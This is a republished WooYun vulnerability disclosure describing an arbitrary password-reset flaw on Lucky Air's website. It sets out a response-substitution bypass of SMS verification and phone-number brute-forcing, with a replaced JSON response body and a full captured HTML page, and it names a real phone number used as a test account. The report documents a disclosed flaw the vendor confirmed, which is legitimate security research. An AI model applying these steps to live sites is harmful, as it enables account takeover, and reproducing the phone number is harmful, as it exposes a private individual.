祥鹏航空某系统任意用户密码重置

2017年3月30日10:30:06评论362 views字数 206阅读0分41秒阅读模式

摘要

2016-03-23：细节已通知厂商并且等待厂商处理中
2016-03-24：厂商已经确认，细节仅向厂商公开
2016-04-03：细节向核心白帽子及相关领域专家公开
2016-04-13：细节向普通白帽子公开
2016-04-23：细节向实习白帽子公开
2016-05-08：细节向公众公开

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-188000

漏洞标题：祥鹏航空某系统任意用户密码重置

漏洞作者：黑骑士

提交时间： 2016-03-23 09:57

公开时间： 2016-05-08 10:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：逻辑错误设计缺陷

1人收藏

漏洞详情

披露状态：

简要描述：

祥鹏航空某系统任意用户密码重置

详细说明：

http://www.luckyair.net/

祥鹏航空官方主站用户密码可以在忘记密码页面任意重置

绕过思路：

系统首先获取绑定手机的验证码，进行验证，正确即返回输入新密码页面，错误即返回报错页面，同时将账号信息记入cookie。输入新密码后直接把新密码和cookie返回系统，不再做验证。因此只需先记录正确跳转至新密码页面的返回包，在输入验证码后用其替代报错页面返回包即可绕过验证。

另外通过发送手机验证码的位置可以轻易爆破出用户手机号，用户账号安全面临严重威胁

漏洞证明：

http://www.luckyair.net/

祥鹏航空主页点击用户登录

点击忘记密码

这里可以爆破一下用户手机号，点击发送口令抓返回包即可。航空公司的用户量非常大，跑了一小会就出来一堆用户手机号

选个测试账号13802035266，点获取口令。随便填入全零。

点击下一步抓返回包，看到报错信息

将包中内容替换为

code 区域

{"email":null,"errorMessage":"OK","j_captcha_response":"9F5E","mobileNo":"13802404669"}

后面还有一个数据包

提交后抓返回包，看到是报错页面

将报错页面替换成之前记录的输入新密码页面提交（代码太长，放在最后）

成功跳转至输入新密码页面

输入新密码TEST000000，提交成功

登陆看看

输入密码页面的数据包

code 区域

HTTP/1.1 200 OK
 Server: nginx/1.7.11
 Date: Wed, 23 Mar 2016 00:53:42 GMT
 Content-Type: text/html;charset=UTF-8
 Connection: keep-alive
 Content-Length: 20714
 
 
 
 
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
  <head id="">
   <meta http-equiv="X-UA-Compatible" content="IE=8"/>
   <meta name="keywords" content="ç¥¥é¹èªç©º[å®æ¹ç½ç«] æºç¥¨ç§æ|èªçæ¥è¯¢|åçä¹æº|éåºé¢è®¢|åå..." />
   <meta name="description" content="äºåç¥¥é¹èªç©ºæéè´£ä»»å¬å¸ï¼ç®ç§°ï¼ç¥¥é¹èªç©ºï¼æ¯ä¸å½ç¬¬åå¤§èªç©ºéå¢ââæµ·èªéå¢çèªç©ºæåä¼ä¸ãå¨'2010ä¸å½ä¼ä¸500å¼º'ä¸ï¼æµ·èªéå¢æåç¬¬179ä½ãæµ·èªéå¢æä¸æºéæ»è§æ¨¡290æ¶ï¼å¶å¨äºåçè¿åä»½é¢åå±äºåå¸åºç¬¬äºã" />
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta name="keywords" content="ç¥¥é¹ ç¥¥é¹èªç©º äºåèªç©º ç®åçæ´» å¿«ä¹é£è¡ äºåç¥¥é¹èªç©ºæéè´£ä»»å¬å¸ èªç©ºææ¸¸ æµ·èªäºå" />
   <title>ç¥¥é¹èªç©º[å®æ¹ç½ç«] èªçæ¥è¯¢|æºç¥¨ç§æ|éåºé¢è®¢|ç§è½¦|åå...</title>
   <link href="http://www.luckyair.net/favicon.ico" rel="shortcut icon" />
   <script src="/themes/luckyair2016/js/jquery-1.7.2.min.js"></script>
   <!-- ä¸ºäºç»ä¸äºé¡µé¢åªåµå¥å¤´å°¾ éè¦å¼å¥å°±å¾cssæä»¶åjsæä»¶-->
   <link rel="stylesheet" href="/themes/luckyair2014/css/basic.css" />
   <link rel="stylesheet" href="/themes/luckyair2014/css/index.css" />
   <link href="/themes/luckyair2016/css/basic.css" rel="stylesheet" type="text/css" />
   <link href="/themes/luckyair2016/css/index.css" rel="stylesheet" type="text/css" />
   <script type="text/javascript" >
    function getpath(){
    //æ ¹ç®å½
    var path = "";
    return path;
    }
   </script>
   <!-- æ¥ææ§ä»¶ -->
   <script src="/js2014/jquery.json-2.3.min.js" type="text/javascript"></script>
   <script src="/themes/luckyair2014/js/ui.js" type="text/javascript"></script>
   
   <!-- æ¥ææ§ä»¶ -->
   <script src="/js2014/jqueryui/i18n/jquery.ui.datepicker-zh-CN.js" type="text/javascript"></script>
   <script src="/js2014/jqueryui/ui/jquery.ui.core.js" type="text/javascript"></script>
   <script src="/js2014/jqueryui/ui/jquery.ui.widget.js" type="text/javascript"></script>
   <script src="/js2014/jqueryui/ui/jquery.ui.datepicker.js" type="text/javascript"></script>
   <!-- åå¸ä¸åç  -->
   <script type="text/javascript" src="/js2014/jqueryui/ui/jquery.ui.position.js" ></script>
   <script type="text/javascript" src="/js2014/jqueryui/ui/jquery.ui.menu.js" ></script>
   <script type="text/javascript" src="/js2014/jqueryui/mfui/jquery.ui.cityautocomplete.js" ></script>
   <script src="/js2014/aircity/airport_8L.js" type="text/javascript"></script>
   <link rel="stylesheet" href="/js2014/jqueryui/themes/base/jquery.ui.all.css"></link>
   <link rel="stylesheet" href="/js2014/jqueryui/themes/smoothness/jquery-ui-1.9.2.custom.css"></link>
   
   <!-- å¼¹æ¡ -->
    <script src="/themes/luckyair2016/js/alert-dialog/dialog-min.js" type="text/javascript"></script>
    <script src="/themes/luckyair2016/js/alert-dialog/menu.js" type="text/javascript"></script>
    <link href="/themes/luckyair2016/css/alert-dialog/ui-dialog.css" rel="stylesheet"></link>
    <!-- ç»å½ -->
    <script src="/themes/luckyair2016/js/textUtils.js"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 
 <style type="text/css">
  .errorMsg{
   color: red;
   font-size: 12px;
  }
  .gray{color: #999;font-size: 12px;}
 </style>
  </head>
 <body>
 
 <!-- è¯¥é¡µé¢æ¯ç»åªåµå¥å¤´å°¾çé¡µé¢æç -->
 <div class="">
  
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 
 
 
 <!-- ç»å½é¡µ -->
 
 <input type="hidden" id="loginUser" value="null"/>
 <script src="/themes/luckyair2016/js/login.js"></script>
 <!-- é®ç½©å± -->
   <div class="alert_c" style="display:none;" id="alert_div"></div>
   <!-- end é®ç½©å± -->
   <!-- å¼¹åºå± -->
   <div class="popLogin hide" id="alert_login" style=";">
    <div class="pop_hd cf">
     <ul class="popTab" id="loginTab">
      <li><a class="hover" href="javascript:void(0)">ä¼åç»å½</a></li>
      <li><a href="javascript:void(0)">åæ³¨åç»å½</a></li>
      <li style="width:132px;margin-right:0px;"><a href="javascript:void(0)">å¤§å®¢æ·ç»å½</a></li>
     </ul>
    </div>
    <div class="pop_bg">
     <!-- æ®éä¼åç»å½start -->
     <form action="/Login.action" method="post" id="commonLogin">
     <table width="100%" class="tb_style03" >
      <tr>
       <th style="width:60px;">ç¨æ·å</th>
       <td><input style="width:240px;" class="input_gray_peo" type="text" name="userName" id="userName" placeholder="é®ç®±/ææºå·/ç¨æ·å"><i class="ico" id="userNameImg"></i></td>
      </tr>
      <tr>
       <th>å¯ ç </th>
       <td><input style="width:240px; margin-right:8px;" class="input_gray_pass02" type="password" name="password" id="password" placeholder="å¯ç " id="pwdImg"><i class="ico"></i></td>
      </tr>
      <tr>
       <th>éªè¯ç </th>
       <td><input style="width:150px; margin-right:8px;" class="input_gray_pic" type="text" name="j_captcha_response" id="j_captcha_response" placeholder="éªè¯ç "><img src="/jcaptcha?.tmp=0.06781555591097987" title="ç¹å»æ´æ¢éªè¯ç " name="capthcaChange" id="capthcaChange1" style="cursor: pointer;"/><i class="ico"></i></td>
      </tr>
      <tr>
       <td colspan="2" align="center"><span class="c_red f_12" id="errmsg01">&nbsp;</span></td>
      </tr>
     </table>
     </form>
     <!-- åæ³¨åç¨æ·  -->
     <form action="/nonRegLogin1Ajax.action" method="post" id="phoneLogin">
     <table width="100%" class="tb_style03 hide" >
      <tr>
       <th style="width:60px;">ææºå·</th>
       <td>
       <input style="width:240px;" class="input_gray_peo" type="text" name="mobile1" id="mobile1" placeholder="è´ç¥¨æ¶è¾å¥çææºå·">
       <input type="hidden" name="mobile" value="" id="mobile">
       <i class="ico"></i>
       </td>
      </tr>
      <tr>
       <th>éªè¯ç </th>
       <td><input style="width:128px; margin-right:8px;" class="input_gray_pic" type="text" name="jCaptchaResponseNoreg" id="jCaptchaResponseNoreg" placeholder="éªè¯ç "><img src="/jcaptcha?.tmp=0.06781555591097987" name="capthcaChange" id="capthcaChange2" title="ç¹å»æ´æ¢éªè¯ç " style="cursor: pointer;"/><i class="ico"></i></td>
      </tr>
      <tr>
       <th>å£ä»¤</th>
       <td><input style="width:128px; margin-right:8px;" class="input_gray_pass02" type="text" name="pass" id="pass" placeholder="ææºå£ä»¤"><a title="ç¹å»åéå£ä»¤" href="javascript:void(0);" id="sendSms" style="color: red;text-decoration: none;">åéå£ä»¤</a><i class="ico"></i></td>
      </tr>     
      <tr>
       <td colspan="2" align="center"><span class="c_red f_12" id="errmsg02">&nbsp;</span></td>
      </tr>
     </table>
     </form>
     <!-- åæ³¨åç¨æ· end -->
     <!-- å¤§å®¢æ·  -->
     <form action="/kcLoginAjax.action" method="post" id="kcLogin">
     <table width="100%" class="tb_style03 hide">
      <tr>
       <th style="width:60px;">ç¨æ·å</th>
       <td><input style="width:240px;" class="input_gray_peo" type="text" name="kcUserName" id="kcUserName" placeholder="å¤§å®¢æ·ç¨æ·å"><i class="ico"></i></td>
      </tr>
      <tr>
       <th>å¯ç </th>
       <td><input style="width:240px; margin-right:8px;" class="input_gray_pass02" type="password" name="kcPassword" id="kcPassword" placeholder="å¯ç "><i class="ico"></i></td>
      </tr>
      <tr>
       <th>éªè¯ç </th>
       <td><input style="width:150px; margin-right:8px;" class="input_gray_pic" type="text" name="kc_j_captcha_response" id="kc_j_captcha_response" placeholder="éªè¯ç "><img src="/jcaptcha?.tmp=0.06781555591097987" title="ç¹å»æ´æ¢éªè¯ç " name="capthcaChange" id="capthcaChange3" style="cursor: pointer;"/><i class="ico"></i></td>
      </tr>
      <tr>
      <th></th>
      <td><span style="font-family: Microsoft YaHei"><a style="text-decoration: underline;cursor: pointer;width:80px;margin-left: 157px;color: blue;background-color: white;border: 0px;display: inline-block;line-height: 30px;height: 30px;padding-left: 10px;"    onclick="window.open('https://luckyair.easyebank.com/comm_gateway/xp_gkcz.htm?clientType=xphk&serverType=2')" >ç¥¥äºå¡è´å¡</a></span></td>  
        </tr>
      <tr>
       <td colspan="2" align="center"><span class="c_red f_12" id="errmsg03">&nbsp;</span></td>
      </tr>
     </table>
     </form>
     <!-- å¤§å®¢æ· end -->
     <div class="m_t_20 m_b_10 tc">
      <p class="m_b_10">
      <span style="width:125px;padding: 5px 28px 5px 28px;"  class="btn_red04"   id="loginsubmit" data-value="commenUser">ç»å½&nbsp;<i id="loading"></i></span>
      <span style="width: 10px;">&nbsp;&nbsp;</span>
      <span style="width:125px;padding: 5px 28px 5px 28px;" class="btn_red04"  id="closeLogin" >å³é</span>
      </p>
      <p><a href="/frontend2014/users/modifyinfo/resetPassword.jsp" style="color: blue;"><u>å¿è®°å¯ç </u></a>  |  <a href="/frontend/users/register/userReg.action?flag=c" style="color: blue;"><u>å¿«éæ³¨å</u></a></p>
     </div>
     <!--  -->
    </div>
   </div>
   
 <div id="divifrom" style="display: none;">
 <iframe id="iframemess" width="0px;" height="0px;" src="/frontend/users/register/regsentCodePage.action" ></iframe>
 </div>
 <!-- æ è®°(logo)åºå -->
   <div class="branding">
    <div class="head w_1000a">
     <!-- é¦é¡µ -->
     <div class="home fl">
      <a href="/"><i></i>é¦é¡µ</a>
     </div>
     <!-- end é¦é¡µ -->
     <!-- ç»å½ -->
     <div class="loginaBar fr">
      <div class="login">
       
        <p><a href="javascript:void(0);" id="username" >ä¼åç»å½</a></p>
        <p><a href="/frontend/users/register/userReg.action?flag=c" >é©¬ä¸æ³¨å</a></p>
       
      </div>
      <div class="lang">
       <p><a class="m_r_35" href="#">ä¸æ</a><a href="#">English</a></p>
       <p>(+86)  95071950</p>
      </div>
     </div>
     <!-- end ç»å½ -->
     <!-- ä¸»å¯¼èª -->
     <div class="nav">
      <ul class="nav_list">
       <li><a href="#">é¢è®¢æå¡<i></i></a>
        <div class="navSub hide">
         <ul class="navSub_list">
          <li><a href="/frontend/order/SearchMyOrder.action">æçè®¢å</a></li>
          <li><a href="/extraProduct/frontend/buySeat/buySeatTemp.jsp">éæ©æºä¸åº§ä½</a></li>
          <li><a href="/extraProduct/frontend/meal/inputForMeal.jsp">é¢è®¢æºä¸é¤é£</a></li>
          <li><a href="/extraProduct/frontend/luggage/inputForLuggage.jsp">è´ä¹°é¾éè¡æ</a></li>
          <li><a href="/extraProduct/frontend/vipHall/reserveVIPHall.action">é¢è®¢è´µå®¾å</a></li>
         </ul>
        </div>
       </li>
       <li><a href="#">åºè¡æå¡<i></i></a>
        <div class="navSub hide">
         <ul class="navSub_list">
          <li><a href="/frontend2014/passengerService/flightD.jsp">èªçå¨æ</a></li>
         </ul>
        </div>
       </li>
       <li><a href="#">ç²¾å½©æ´»å¨<i></i></a>
        <div class="navSub hide">
         <ul class="navSub_list">
          <li><a href="/frontend/miaosha/display.action">ç§æ</a></li>
         </ul>
        </div>
       </li>
       <li><a href="#">å¨çº¿æå¡<i></i></a>
        <div class="navSub hide">
         <ul class="navSub_list" style="color: #fff;">
          <li style="text-indent: 7px;">ççº¿çµè¯ï¼95071950</li>
         </ul>
        </div> 
       </li>
      </ul>
     </div>
     <!-- end ä¸»å¯¼èª -->
    </div>
   </div>
   <!-- end æ è®°(logo)åºå -->
 <script src="/themes/luckyair2016/js/cut.js"></script>
 <script src="/themes/luckyair2016/js/frontend_title.js"></script>
 
   <!-- end æ è®°(logo)åºå -->
   <!-- logo -->
   <div class="logo02"></div>
   <!-- end logo -->
  <!-- content start-->
   <div class="news-content mb30" style="background: #fff" >
   
   <!-- åè½é¡µé¢ -->
   <script type="text/javascript">
 
  function checkPwd(){
   var pwd1 = $("#newpwd").val();
   var pwd2 = $("#pwd1").val();
   
   if(pwd1==""){
    $("#errorMessagePwd").removeClass().addClass("errorMsg");
    document.getElementById("errorMessagePwd").innerHTML="è¯·è¾å¥å¯ç ";
    return false;
   }else{
    var tmp = pwd1.replace(/^(/s)*|(/s)*$/g,"");
    var len = tmp.length;
    if(len==0){
     $("#errorMessagePwd").removeClass().addClass("errorMsg");
     document.getElementById("errorMessagePwd").innerHTML="å¯ç ä¸è½å¨é¨ä¸ºç©ºæ ¼ã";
     return false;   
    }else if(len>20||len<6){
     $("#errorMessagePwd").removeClass().addClass("errorMsg");
     document.getElementById("errorMessagePwd").innerHTML="å¯ç é¿åº¦å¿é¡»ä¸º6ï½20ä¸ªåç¬¦ã";
     return false;
       }else if(isNumStr(pwd1)){
        $("#errorMessagePwd").removeClass().addClass("errorMsg");
        document.getElementById("errorMessagePwd").innerHTML="å¯ç ä¸è½å¨é¨ä¸ºæ°åã";
        return false;
       }
   }
   document.getElementById("errorMessagePwd").innerHTML="";
   if(pwd2==""){
    document.getElementById("errorMessagePwd1").innerHTML="è¯·åæ¬¡è¾å¥æ°å¯ç ";
    return false;
   }
   
   if(pwd1!=pwd2){
    document.getElementById("errorMessagePwd1").innerHTML="ä¸¤æ¬¡è¾å¥çå¯ç ä¸ä¸è´";
    return false;
   }
   document.getElementById("errorMessagePwd1").innerHTML="";
   resetPwd();
  }
 
  function resetPwd(){
   var url = '/frontend2014/users/modifyinfo/GetUser!resetPwd.action?newPwd='+$("#newpwd").val();
   $.ajax({
      type: 'POST',
      url: url,
      success: processResetPwd
    });
  }
 
  function processResetPwd(responseText, textStatus, XMLHttpRequest){
   var msg= responseText.msg;
   $("#resetPwd").hide();
   $("#restPwdRes").show();
   if(msg=='Yes'){
    $("#msg").html("å¯ç éç½®æå!"); 
   }else{
    $("#msg").html("å¯ç ä¿®æ¹å¤±è´¥ï¼è¯·èç³»ç®¡çå!");
   }
  }
  
  //æ£æ¥åç¬¦ä¸²æ¯å¦å¨æ¯æ°å
  function isNumStr(val){
   var pattern = /^[0-9]+$/;
   if (pattern.test(val)){
    return true;
   }
   return false;
  }
  
 </script>
 
  
 
 
  <!-- content start-->
 
   <div class="main_content_top clear js_main_content">
    <div id="resetPwd">
    <div class="password_box">
     <ul class="order_flow_menu clear">
      <li>
       <i></i><span>å¡«åææºå·</span>
      </li>
      <li>
       <i></i><span>æ¶å°éªè¯ç ï¼å¹¶åçå®å¨é®é¢</span>
      </li>
      <li class="on">
       <i></i><span>éç½®å¯ç </span>
      </li>
     </ul>
    </div>
    <p class="password_til">ç¬¬ä¸æ¥ï¼éç½®å¯ç </p>
    <form id="regForm" method="post">
    <div class="password_content" id="by_mobile">
     <ul class="member_info_edit" style="padding-left:100px;">
     <li></li>
      <li>
       <label>æ°å¯ç ï¼</label>
       <input type="password" value="" name="newpwd" id="newpwd"/>
       <span class="gray" id="errorMessagePwd">é¿åº¦ä¸º6-20ä¸ªåç¬¦</span> 
      </li>
      <li></li><li></li>
      <li>
       <label>ç¡®è®¤å¯ç ï¼</label>
       <input type="password" name="pwd1" id="pwd1" value="" />
       <span class="errorMsg" id="errorMessagePwd1"></span>
      </li>
     </ul>
    </div>
    </form>
    <p class="member_info_save mt30">
     <a class="icon filghts_btn_search" href="javascript:void(0);" onclick="return checkPwd()">ç¡®è®¤</a>
    </p>
    </div>
    <div id="restPwdRes" style="display: none;font-size: 14px;color: red;" >
     <p align="center" style="margin-top: 20%"><span id="msg"></span></p>
    </div>
   </div>
  <!-- content end-->
 <script>(function(){$('.logo02').remove();})();</script>
   <!-- é¦é¡µ -->
   </div>
 
  <!-- content end-->
  
 <!-- åºé¨ä¿¡æ¯ -->
   <div class="footBar m_t_10">
    <div class="foot w_1000a cf p_t_10 p_b_10">
     <div class="news fl">
      <h3 class="tit m_b_15">ææ°æ¶æ¯</h3>
      <ul class="newList" id="news">
       
      </ul>
     </div>
     <!-- end top -->
     <div class="footMenu cf fl">
      <div class="fl" style="width:470px;">
      <dl class="fm_list fl">
       <dt>å¸®å©ä¸å¿</dt>
       <dd><a href="/frontend2016/help/helpTips.jsp?index=1">æå®¢é¡»ç¥</a></dd>
       <dd><a href="/frontend2016/help/helpTips.jsp?index=2">è´ç¥¨æå</a></dd>
       <dd><a href="/frontend2016/help/helpTips.jsp?index=3">ç¥¨å¡å¤ç</a></dd>
       <dd><a href="/frontend2016/help/helpTips.jsp?index=4">æå¡æå</a></dd>
       <dd><a href="/frontend2016/help/helpTips.jsp?index=5">ä¼æ å¸ä¸ç§¯å</a></dd>
      </dl>
      <dl class="fm_list fl">
       <dt>å³äºæä»¬</dt>
       <dd><a href="/frontend2016/help/aboutUs.jsp?index=1">å¬å¸ç®ä»</a></dd>
       <dd><a href="/frontend2016/help/aboutUs.jsp?index=2">åå¬å°å</a></dd>
       <dd><a href="/frontend2016/help/aboutUs.jsp?index=3">èªçº¿ç½ç»</a></dd>
       <dd><a href="/frontend2016/help/aboutUs.jsp?index=4">èªçæ¶å»</a></dd>
      </dl>
      <dl class="fm_list fl">
       <dt>èç³»æä»¬</dt>
       <dd><a href="/frontend2016/help/contactUs.jsp?index=1">å®æ¹æå¡ççº¿</a></dd>
       <dd><a href="/frontend2016/help/contactUs.jsp?index=2">æè¯å»ºè®®</a></dd>
       <dd><a href="/frontend2016/help/contactUs.jsp?index=3">åªä½ä¸çº¿</a></dd>
       <dd><a href="/frontend2016/help/contactUs.jsp?index=4">è¥ä¸æå°</a></dd>
       <dd><a href="/frontend2016/help/contactUs.jsp?index=5">BSPä»£ç</a></dd>
       <dd><a href="/frontend2016/help/contactUs.jsp?index=6">è´§è¿ä¸å¡</a></dd>
      </dl>
      <dl class="fm_list fl">
       <dt>åæé¾æ¥</dt>    
       <dd><a href="http://www.hnair.com" target="_blank">æµ·åèªç©º</a></dd>      
       <dd><a href="http://www.westair.cn" target="_blank">è¥¿é¨èªç©º</a></dd>
       <dd><a href="http://www.tianjin-air.com" target="_blank">å¤©æ´¥èªç©º</a></dd>
       <dd><a href="http://www.capitalairlines.com.cn" target="_blank">é¦é½èªç©º</a></dd>
       <dd><a href="http://www.fuzhou-air.cn" target="_blank">ç¦å·èªç©º</a></dd>
       <dd><a href="http://gt.hnair.com/gt/" target="_blank">ç¥¥é¹å¢éç½</a></dd>
       <dd><a href="http://x.luckyair.net:88/cms/" target="_blank">ç¥¥é¹åéååå°</a></dd>
      </dl>
      </div>
      <div class="fl"  style="width:180px;">
       <div style="margin-top: -17px;margin-left: 84px;">
        <a class="btn_top" href="javascript:void(0)">è¿åé¡¶é¨</a>
       </div>
       <div>
        <div class="appBar fr m_t_45">
         <div class="mob m_b_5">
          <ul class="mob_list">
           <li>
            <a href="#">
             <b><img src="/themes/luckyair2016/images/ico_weixin.png" /></b>
             <p>å®æ¹å¾®ä¿¡</p>
            </a>
           </li>
           <li>
            <a href="#">
             <b><img src="/themes/luckyair2016/images/ico_xina.png" /></b>
             <p>å®æ¹å¾®å</p>
            </a>
           </li>
           <li>
            <a href="#">
             <b><img src="/themes/luckyair2016/images/ico_app.png" /></b>
             <p>ææºAPP</p>
            </a>
           </li>
          </ul>
         </div>
        </div>
       </div>
      </div>
     </div>
    </div>
    <!-- end åºé¨ä¿¡æ¯ -->
    <!-- ç«ç¹ä¿¡æ¯ -->
    <div class="site_info">
     <div class="w_1000a">
      
      <p><span class="ico m_t_5"><em>&copy;</em>2012-2016 luckyair.net äºåç¥¥é¹èªç©ºæéè´£ä»»å¬å¸ çæææ ææ¯æ¯æï¼æµ·åæå»ºç§æè¡ä»½æéå¬å¸ æ»ICPå¤11002836å·</span> <span class="ico m_t_9 m_l_10">
      <a href='https://ss.knet.cn/verifyseal.dll?sn=e14032853010047599h1h9000000&ct=df&a=1&pa=0.03910850009815292' target='_blank'>
      <img src="/themes/luckyair2016/images/ico_kx.png" alt="å¯ä¿¡ç½ç«"/></a></span>
       <span class="ico m_t_9 m_l_10">
      <a id='___szfw_logo___' href='https://credit.szfw.org/CX20160112013238590188.html' target='_blank'>
      <img src="/themes/luckyair2016/images/footer-cnnic1.png" alt="è¯ä¿¡ç½ç«"/></a></span>
      </p>
     </div>
    </div>
    <!-- end ç«ç¹ä¿¡æ¯ -->
   </div>
 <!-- footer start -->
 <script src="/themes/luckyair2016/js/frontend_footer.js"></script>
 <script type='text/javascript'>
 $(document).ready(function(){
  var url = '/index/sitemsg!doAjaxQuery.action';
  loadAnn(url);
 
  //åå°é¡¶é¨ç¼å¨å¨ç»
  $('.btn_top').on('click', function() {
   $('html,body').animate({
    scrollTop: 0
   }, 300);
   return false;
  }).attr({
   'href': 'javascript:void(0)'
  });
 });
 </script>
 
  
 </div>
 <script src="/js/dcs_tag.js" type="text/javascript"></script>
 </body>
 
 
 </html>

修复方案：

版权声明：转载请注明来源黑骑士@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2016-03-24 10:12

厂商回复：

谢谢，我们会立即安排整改。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-188000

漏洞标题： 祥鹏航空某系统任意用户密码重置

相关厂商： 祥鹏航空

漏洞作者： 黑骑士

提交时间： 2016-03-23 09:57

公开时间： 2016-05-08 10:12

漏洞类型： 设计缺陷/逻辑错误

危害等级： 高

自评Rank： 15

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 逻辑错误 设计缺陷

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑骑士@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(6) 关注此漏洞

漏洞标题：祥鹏航空某系统任意用户密码重置

相关厂商：祥鹏航空

漏洞作者：黑骑士

漏洞类型：设计缺陷/逻辑错误

危害等级：高

漏洞状态：厂商已经确认

Tags标签：逻辑错误设计缺陷

版权声明：转载请注明来源黑骑士@乌云

漏洞评价(共0人评价):

登陆后才能进行评分